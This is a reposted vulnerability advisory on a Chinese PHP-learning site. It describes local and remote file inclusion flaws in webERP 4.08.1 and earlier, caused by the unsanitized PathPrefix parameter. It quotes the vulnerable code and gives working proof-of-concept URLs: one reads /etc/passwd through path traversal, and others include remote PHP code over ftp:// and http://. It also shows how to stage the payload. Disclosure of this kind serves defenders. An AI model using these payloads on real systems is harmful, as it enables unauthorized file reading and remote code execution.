网站地图    收藏   

主页 > 后端 > 网站安全 >

webERP <= 4.08.1本地及远程文件包含 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] # [ webERP = 4.08.1 ] Local/Remote File Inclusion Vulnerability #影响程序: Accounting Best Practice Business Administration System官网: http://www.weberp.org/下载地址: http......

# [ webERP <= 4.08.1 ] Local/Remote File Inclusion Vulnerability  # 
影响程序: "Accounting & Best Practice Business Administration System" 
官网:   http://www.weberp.org/ 
下载地址: http://sourceforge.net/projects/web-erp/files/ 
 
缺陷所出文件: ./webERP/index.php (line: 4) 
 
#   1    <?php 
 
#   2    $PageSecurity=0; 
 
#   3 
 
#   4    include('includes/session.inc');                    // 1 
 
#  ..cut.. 
 

 
# File: ./webERP/includes/session.inc (lines: 4-16) 
 
#  ..cut.. 
 
#   4    if (!isset($PathPrefix)) {                          // 2 
 
#   5        $PathPrefix=''; 
 
#   6    } 
 
#   7 
 
#   8 
 
#   9    if (!file_exists($PathPrefix . 'config.php')){      // 3 
 
#  10        $rootpath = dirname(htmlspecialchars($_SERVER['PHP_SELF'],ENT_QUOTES,'UTF-8')); 
 
#  11        if ($rootpath == '/' OR $rootpath == "\\") { 
 
#  12            $rootpath = ''; 
 
#  13        } 
 
#  14        header('Location:' . $rootpath . '/install/index.php'); 
 
#  15    } 
 
#  16    include($PathPrefix . 'config.php');                // 4 [LFI]/[RFI] 
 
#  www.2cto.com
 
#     
 
# [LFI] ( magic_quotes_gpc = Off; ) 
 
# Vuln: http://www.2cto.com /webERP/index.php?PathPrefix=../../../../../../etc/passwd%00 
 

 
# [RFI #1] ( allow_url_fopen = On; allow_url_include = On; register_globals = On; ) 
 
# It is possible to bypass line: (!file_exists($PathPrefix . 'config.php')), 
 
# when we use some url wrappers. For example ftp:// 
 
示例: 
 

 
# dun@rd01 ~ $ cat ./config.php 
 
#  <?php phpinfo(); ?> 
 
# dun@rd01 ~ $ ftp ftp.server.com 
 
#  Connected to ftp.server.com. 
 
#  Name (ftp.server.com): user 
 
#  331 User user OK. Password required 
 
#  Password: 
 
#  230 OK. Current restricted directory is / 
 
#  ftp> put config.php 
 
#  local: config.php remote: config.php 
 
#  200 PORT command successful 
 
#  226 File successfully transferred 
 
#  ftp> quit 
 
#  221 Logout. 
 

 
# Now we can use url: 
 
# Vuln: http://www.2cto.com /webERP/index.php?PathPrefix=ftp://user:password@ftp.server.com/ 
 
# In this case, script checks if the file 'ftp://user:password@ftp.server.com/' . 'config.php' does not exist. 
 
# If exist, then include it. 
 
 
# [RFI #2] ( allow_url_include = On; register_globals = On; )  
 

 
# File: ./webERP/includes/LanguageSetup.php (lines: 29-84) 
 
#  ..cut..   
 
#  29    if (!function_exists('gettext')) { 
 
#  ..cut.. 
 
#  34        require_once($PathPrefix . 'includes/php-gettext/streams.php'); 
 
#  ..cut.. 
 
#  64    } else { 
 
#  65        include($PathPrefix . 'includes/LanguagesArray.php'); 
 
#  ..cut.. 
 
#  84    } 
 
#  ..cut.. 
 

 
缺陷: http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt? 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论